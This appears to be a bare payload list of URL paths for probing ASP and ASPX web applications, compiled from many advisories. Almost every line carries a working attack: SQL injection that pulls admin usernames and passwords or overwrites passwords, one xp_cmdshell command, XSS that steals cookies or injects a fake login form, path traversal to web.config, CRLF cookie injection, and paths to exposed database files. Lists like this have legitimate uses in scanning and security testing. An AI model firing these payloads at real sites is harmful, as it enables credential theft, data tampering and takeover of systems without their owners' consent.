/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS] 
/ocp/admin/fileKontrola/browser.asp?root=/ 
/eshop/10browse.asp?ProductCode=' 
/cezanneweb/CznCommon/CznCustomContainer.asp?ACTION=RETRIEVE&Columns=2&Title=7302053&TitleParms="></title><script>alert(&#039;%20S21Sec%20&#039;)</script>&WidgetsFunctions=7100027%2C7302015&WidgetsColumns=1%2C1&WidgetsTogglers=Y%2CY&WidgetsHeights=%2D1%2C%2D1&WidgetsLinks=&WidgetsTitles=%2D1%2C%2D1&HideNonWorkingWidgets=Y&FUNID=7302031&LINKID=%2D1
/owSearch/DisplayResults.asp?sIDSearch=15%20or%201=1 
/browse.asp?<script>alert(document.cookie)</script> 
/[Path]/search.asp?search=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&submit=%3E
/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E 
/Demos/MC/all_calendars.asp?month=4&year=2006&cate=&cTYPE=1&calsids=&#039;%20or%20&#039;=&#039;
/search.asp?search=[xss]
/owBasket/owAddItem.asp?idProduct='SQL_INJECTION 
/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112
/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 
/result.asp?city=[xss]
/result.asp?city=1&cat=2&imageField2=1&State=[xss]
/search.asp?sort=ed&L=[XSS]
/search.asp?sort=[XSS]
/search.asp?sort=ed&L=1&category=[XSS]
/search.asp?sort=ed&L=1&category=65&categoryname=[XSS] 
/index.html?ClickAndRank/details.asp
/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
/myaccount/viewProfile.asp?member='update Members set Password='hacked';-- 
/myaccount/failure.asp?err_txt="><script>alert('Aria-Security.Net')</script> 
/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;waitfor%20delay%20'0
/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
/home/index.asp?UserGUID="><script>alert(document.cookie)</script>
/orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
/db/main.mdb
/content.asp?do_search=0&keywords=contact&page_no=2&sortby=;SELECT%20* FROM bla bla-- 
/aspbb/profile.asp/PROFILE_ID=[sql injection] 
/reply.asp?id=50120815480100001&name=[xss]
/[path_of_application]/admin/radera/tabort.asp?delID=119
/Accessories/admin/edit.asp?iPic=[PictureID] 
/WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2fWebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts."><script>alert(&#039;XSS-By-Lament&#039;)</script>
/[installdir]/operator/article/article_search_results.asp?txtSearch="></form><IMG SRC=javascript
/haberdetay.asp?id=-1%20union%20select%200,1,uyeadi,sifre,mail,id%20from%20uyeler%20where%20id=1
/DUpaypalPro/shops/detail.asp?iPro=40[SQL Inject]&iSub= 
/page.asp?art_id=[SQL]
/page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1 
/cezanneweb/CFLookUP.asp?LookUPId=>"><script>alert("S21sec")</script>&CbFun=Focus_CallBack&FUNID=7302062&CloseOnGet=yes
/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' 
/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer 
/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>
/category_news_headline.asp?ID=2&n=[XSS]
/advsearch.asp?zipr=1&D1=0&D4=1&zipOpt=20&dosearch=[xss]
/home.asp/
/home.asp/../menu.asp
/poster/?go=setup_submit&un=DarkKnight&pw=123456&em=EMAIL&submit=submit 
/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm' 
/albums.asp?cat=&albumid=[XSS]
/ArticleDisplay/Archive.asp?DOMAIN_Link=&sSort=SubmitDate&iSearchID=389&sKeywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E 
/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/film.asp?film=1+union+select+0,1,sifre,3,4,5+from+ayarlar 
/news.asp?p_pagealias=news&p_news_id=1[SQL] 
/%20<script>alert(window.location=(window.location+"a").slice(0,48)+"view=activateSettingObj&popUpViewRequest=activatePopup&view_func=frameset&view_module=activate_setting");</script>/*.aspx 
/bp/database/dbBlogMX.mdb
/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
/ScriptPath/default.asp?islem=gruplar&grup=[SQL]
/path/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users 
/bp/upload.asp
/index.asp?inc='>[XSS]
/index.asp?inc=profile&searchtext='>[XSS]
/index.asp?inc=forumread&article='>[XSS]
/index.asp?inc=blog&pageid='[SqlQuery]
/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
/admin_category_details.asp?mode=%3C/textarea%3E&#039;%22%3E%3Cscript%3Ealert(&#039;document.cookie&#039;)%3C/script%3E
/perform_search.asp?order1=1&order2=1&search="><script>alert(String.fromCharCode(34,115,115,34));</script>1
/fipsCMS/forum/neu.asp?kat=1+union+select+0,pw_admin+from+config 
/include/result.asp?debug=print&cols=3&linecolor=%23AAAAAA&menu=category&body=bodyblue&bold=bodyheading&hlcolor=%2388C4FF&bgcolor=%23E0FFE0&menucolor=%23E0FFE0&hdcolor=%23B0B0B0&idcolor=%23FFFFFF&header=bodywhite&rowcolor=[XSS]
/include/result.asp?debug=print&cols=3&linec
/displayCalendar.asp?date=[SQL Injection]
/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config
/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
/[path]/image.mdb 
/viewcart.asp?zoneid=[sql]
/patj/admin/edit.asp?ID=[SLQ]
/members.asp??sent=[sql]
/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A
/default.asp?a=[SQL]
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue 
/detail.asp?iPro=196&iType=[SQL Injection]
/detail.asp?iNews=[SQL Injection]
/detail.asp?iType=[SQL Injection]
/detail.asp?iFile=[SQL Injection]
/detail.asp?action=[SQL Injection]
/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1
/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=2
/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=3
/owBasket/PaymentMethods/owOfflineCC.asp?idOrder= 
/store/access.asp?redirect='"><script>alert(document.cookie)</script> 
/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http
/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin 
//search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E 
/Error.asp?Message=XSS 
/path/activenews_search.asp?query=[XSS]
/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler
/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler
/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler
/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler
/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler
/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler
/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler
/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler 
/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
/vpasp/shopdisplayproducts.asp?id=5&cat=<img%20src="javascript
/vpasp/shopdisplayproducts.asp?id=5&cat=<meta%20http-equiv='refresh'content='0'>
/vpasp/shopdisplayproducts.asp?id=5&cat=<form%20action="http
/ShowPost.asp?ThreadID=1"><script>alert(/Liscker/);</script>
/forum/uploadpro.asp?memori=&deletefile=&mode=
/forum/post.asp
/forum/uploadpro.asp?
/myguestBk/admin/index.asp
/myguestBk/admin/delEnt.asp?id=NEWSNUMBER
/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][sqlInjection] 
/viewad.asp?id='[sql]
/interfaces/standard/domains.asp?txtDomainName=[XSS]
/admin/view.asp 
/myguestBk/add1.asp?name=Name&subject=Subj&email=M@IL&message=<script>alert ("Test!")</script> 
/xss.cgi?ref="+document.URL+"cookie="+document.cookie;</script>
/iframe> 
/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script>
/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script> 
/eshop/20Review.asp?ProductCode=' 
/store/viewCart.asp?message=%3Cplaintext%3E 
/database/db2000.mdb 
/admin/hosting/error.asp?error=Xss vul 
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y
/photoalbum/admin/adminlogin.asp
/m23Basket/AddItem.asp?idProduct=6" method="POST">
/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin 
/script_path/detay.asp?ilan_id=[SQL] 
/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin 
/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()"> etc..
/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http
/member.asp?id=[SQL] 
/printmain.asp?ID='[sql]
/samples/textfilesearch.asp?query=[xss] 
/path/profile-upload/upload.asp?target=code 
/lostPassword.asp?username=[XSS]
/Carts/Computers/viewCart.asp?userID=2893225125722634';exec%20master..xp_cmdshell%20'dir%20c
/category.asp?area=[XSS]
/category.asp?area=support&articleZoneID=[XSS]
/category.asp?area=support&articleZoneID=132&r=[XSS]
/category.asp?example1=[XSS]
/view_print.asp?id=[xss]
/aspfoldergallery/download_script.asp?file=viewimage.asp 
/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="http
/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http
/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button
/ad_click.asp?banner_id='SQL_INJECTION
/[scriptpath]/vf_info.asp?StrMes=[xss]
/target/search.asp?strSQL=SELECT+%2A+FROM+pages+where+1=2+union
/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B-- 
/[scriptoath]/arama.asp?a_r_a_n_a_c_a_k= [xss Code]
/satilik.asp?Kategori=[SQL]
/csm/asp/listings.asp?l='[sql]
/csm/asp/listings.asp?s=search&typ='[sql]
/csm/asp/listings.asp?s=search&typ=4&loc='[sql]
/glossary/glossary.asp?alpha='[sql]
/listmain.asp?cat=[xss]
/infinicart-demo/browse_group.asp?groupid=[sql]
/sw000.asp?SearchCacheId=xx\
/spooky/login/register.asp?UserUpdate=[sql]
/f-email.asp?strPeopleID=1&itemID='[sql]
/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin 
/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert(&#039;DSecRG XSS&#039;)</script>
/searchmain.asp?I1=1&area='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/SAFileUpSamples/util/viewsrc.asp?path=/SAFileUpSamples/%c0%ae./%c0%ae./web.config 
/SAFileUpSamples/util/viewsrc.asp?path=/SAFileUpSamples/../../web.config, in 
/path/item_show.asp?id2006quant=[SQL INJECTION]
/store/searchResults.asp?name='"><script>alert(document.cookie)</script>&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1 
/DUforum/admin/userEdit.asp?id=[SQL Inject] 
/DUportalPro34/Articles/default.asp?iChannel=2[SQL Inject]&nChannel=Articles
/DUportalPro34/Articles/detail.asp?iData=4[SQL Inject]&iCat=292&iChannel=2&nChannel=Articles
/DUportalPro34/home/members.asp?iMem=[SQL Inject]
/DUportalPro34/topics/cat.asp?iCat=4[SQL Inject]&iChannel=16&nChannel=Topics
/DUportalPro34/Polls/default.asp?iChannel=15[SQL Inject]&nChannel=Polls
/DUportalPro34/home/members.asp?iMem=[SQL Inject]
/DUportalPro34/admin/members_listing_approval.asp?offset=[SQL Inject]
/DUportalPro34/admin/channels_edit.asp?iChannel=7[SQL inject]&nChannel=[Name Module] 
/profila.asp?get="><script>alert('Xss Vulnerability');</script>&URL=%2FDefault%2Easp%3F
/gallery/folderview.asp?folder=<script>alert(document.cookie)</script> 
/mcart2pfp/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
/mcart2pal/productsByCategory.asp?intCatalogID=%27SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
/mcart2sqluk/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bpage=2 
/[Path]/search.asp?search='[SQL]&submit=%3E
/ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E 
/login.asp?ret_page=[XSS]
/languageselect.asp?lang_URL=Default.asp%3Flang%3D&ss=x%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&img=1
/languageselect.asp?lang_URL=Default.asp%27};alert%28document.cookie%29;{a=%27%3Flang%3D&ss=x&img=1
/path_to_admin/menuCodeAE.asp?m=edit&i=185%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/path_to_admin/faqAE.asp?m=edit&i=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/path_to_admin/contentAE.asp?m=edit&i=376+ANY_SQL_HERE
/path_to_admin/templatesAE.asp?m=edit&i=1+ANY_SQL_HERE
/default.asp?msg=[XSS]
/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData='SQL_INJECTION&nChannel=Products&iRate=5
/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate='SQL_INJECTION
/owSearch/DisplayResults.asp?sIDSearch=15"><META%20HTTP-EQUIV=Refresh%20CONTENT=0>
/owSearch/DisplayResults.asp?sIDSearch=1"><h1>lalala</h1> 
/store/productDetails.asp?idProduct=[SQL] 
/search.asp?keyword='[SQL HERE]
/post3/book.asp?review=-99&#039;)+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+&#20844;&#20296;&#27396
/simpleblog/?view=archives&month='&year=2006 
/inside.aspx?g=' or '1'='1'-- 
/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http
/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 
/[path]/search_run.asp?keyword=-1&category=-1&order='%20union%20select%200,0,0,Username,Password,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin&x=-1&y=-1
/sample_script_directory/Sample_showcode.html?fname=/../../../../target 
/default.asp?action="><script>alert('Xss Vulnerability');</script>
/errors/transaction.asp?msg=<script>alert('XSS')</script>
/default.aspx?[xss]
/Default.aspx?textonly=[xss]
/Default.aspx?textonly=1&locID=[xss]
/Default.aspx?textonly=1&locID=0ad00v005&lang=[xss]
/guestbook/admin/o12guest.mdb 
/acidcat/databases/acidcat.mdb 
/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/helmonlinehelp/default.asp?categoryID=24&UserLevel=2&SearchText=[XSS]
/helmonlinehelp/default.asp?categoryID=24&UserLevel=[XSS]
/forums.asp?keywords=[XSS]
/[path]/bry.asp?islem=yazidevam&id=-1+union+select+0,0,0,0,0,0,sifre,0+from+admin 
/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)-- 
/page.asp?id=1         
/page.asp?id=1 AND 1=2 
/page.asp?id=1 AND 1=1 
/webadmin/login.asp?url="><script>alert(document.cookie)</script>
/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e 
/slideshow.asp?img_id=290&ci=[SQL Injection]
/login.asp?Admin_ID=[SQL]&Password=pass 
/content.asp?mid=31&incid=17&sent=[sql]
/shop/mensresp.asp?recomend=1&nombre=(CODE)&email=
/shop/mensresp.asp?recomend=1&nombre=%3Cscript%3Ealert('discovery_by_snilabs')%3C/script%3E&email=&email= 
/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64 
/forum/archive.asp?Forum=Test+Forum%5F1%2D13%2D2004%5F11%2D28%2D2004&pages='
/forum/archive.asp?Forum='%20or%20'='%5F1%2D13%2D2004%5F11%2D28%2D2004&pages=4 
/vpasp/shoperror.asp?msg=<img%20src="javascript
/vpasp/shoperror.asp?msg=<meta%20http-equiv='refresh'content=
/articleSearch.asp?keywords=[XSS]
/DUpaypalPro/shops/sub.asp?iSub=[SQL Inject] 
/DUforum/messages.asp?iMsg=[SQL Inject]248&iFor=6 
/search.asp?Search=">&lt;script&gt;alert()&lt;/script&gt; 
/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25
/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25 
/error.asp?err=">[XSS]
//logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded 
/default.asp?language='[SQL injection]
/default.asp?id=1&opr=2&amp%3bpic='[SQL injection]
/default.asp?opr=35&id=1&idcategory='[SQL injection]&idcategoryp=1
/default.asp?opr=35&id=1&idcategory=1&idcategoryp='[SQL injection]
/default.asp?mnu=&id=1&opr=5&content='[SQL injection]
/default.asp?id=1&opr=4&keyword='[SQL injection]
/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='[SQL injection] 
/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler
/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler
/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler 
/web/msgError.asp?Redirect=loginhtm&Reason=<script>alert(document.cookie);</script>
/trial.asp?product=[XSS]
/[patch]/ForumsII.asp?ForumID=[XSS]
/sayfala.asp?id=96+union+select+1,2,3,4,5,user_name,7+from+admin
/sayfala.asp?id=96+union+select+1,2,3,4,5,pass,7+from+admin 
/[scriptpath]/vf_newtopic.asp<iframe height=500 src="http
/computers/default.asp?sort=&Direction=';
/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http
/manager/textbox.asp?id=' 
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]
/lab/nobetcideczane/ayrinti.asp?anahtar=1+union+select+0,1,2,(admin),sifre,5+from+yetkili 
/secureDirectory\somefile.aspx 
/secureDirectory%5Csomefile.aspx
/search.asp?ss=[XSS]
/openlink.asp?LinkID='[sql] 
/Page.asp?PageID=[XSS]
/Page.asp?PageID=1&SiteNodeID=[XSS]
/Page.asp?PageID=1&SiteNodeID=[SQL] 
/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E 
//applications/SecureLoginManager/inc_secureloginmanager.asp?sent=[SQL]
/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] 
/module/support/task/comments.asp?taskid='[SQL_INJECTION] 
/repair/pwd/sentout.asp" method="post"> user
/forum.asp?forum=[SQL] 
/midiscovery/asplib/SignIn.asp
/cs-cms/default.asp?id=70+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) 
/[path]/news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00
/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00 
/APP Portall/data/8275.mdb
/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html> 
/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID='SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops
/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=%27SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops 
/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/activeauctionsuperstore/sendpassword.asp?Table=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Title=Account 
/path/player.asp?player_id=14&selPlayer=[SQL INJECTION]
/event_searchdetail.asp?ID='[sql]
/shop/handle/varer/sok/resultat.asp?strSok=
/NR/System/Access/ManualLogin.asp?
/categories.asp?catID=[SQL Injection]
/categories.asp?editorID=[SQL Injection]
//www.www.example.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS] 
/cat.asp?cat=1&catname=[xss]
/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1
/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor
/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor
/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor 
/[Path]/home/detailad.asp?siteid=[SQL] 
/forum/error.asp?error=[XSS] 
/[ldf path]/login.asp?user=[SQL COMMAND] 
/admin/default.asp
/Default.aspx?tabid=510&error="<script></script>/><iframe<script></script>src=http
/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E
/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E 
/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http
/store/searchResults.asp?name=&idCategory=[SQL]&sku=&priceFrom=0&priceTo=9999999999&validate=1
/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
//owa.example.com/exchweb/bin/auth/owalogon.asp?url=http
/faqDspItem.asp?faqid=[SQL] 
/store/comersus_searchItem.asp?strSearch=0&curPage=2">%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/script_path/W1L3D4_aramasonuc.asp?searchterms=[XSS]
/products/details.asp?Product_ID=[SQL] 
/Comments.asp?&FC=SQL
/document_root/Login.asp?LoginName='Some_SQL_Stuff&Password=&submit=Login 
/viewlinks.asp?CategoryID='[sql]
/bbs/error.asp?message=xss 
/productcart/pc/Custva.asp?redirectUrl=&Email=%27+having+1
/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler 
/path/showfile.asp?fid=[SQL Injection]
/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
/poll/showresult.asp?catid=[sqli] 
/liberum/view.asp?id='[SQL Injection]
/liberum/register.asp?edit='[SQL Injection]
/liberum/print.asp?id='[SQL Injection] 
/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script> 
/prePurchaserRegistration.asp?example6=[XSS]
/asp/listings.asp?l='[sql] 
/asp/listings.asp?s=search&typ='[sql] 
/asp/listings.asp?s=search&typ=4&loc='[sql]
/resend.asp?ID=[SQL query]
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
/src=www.example.com/home-f.asp?sitebid=%00
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
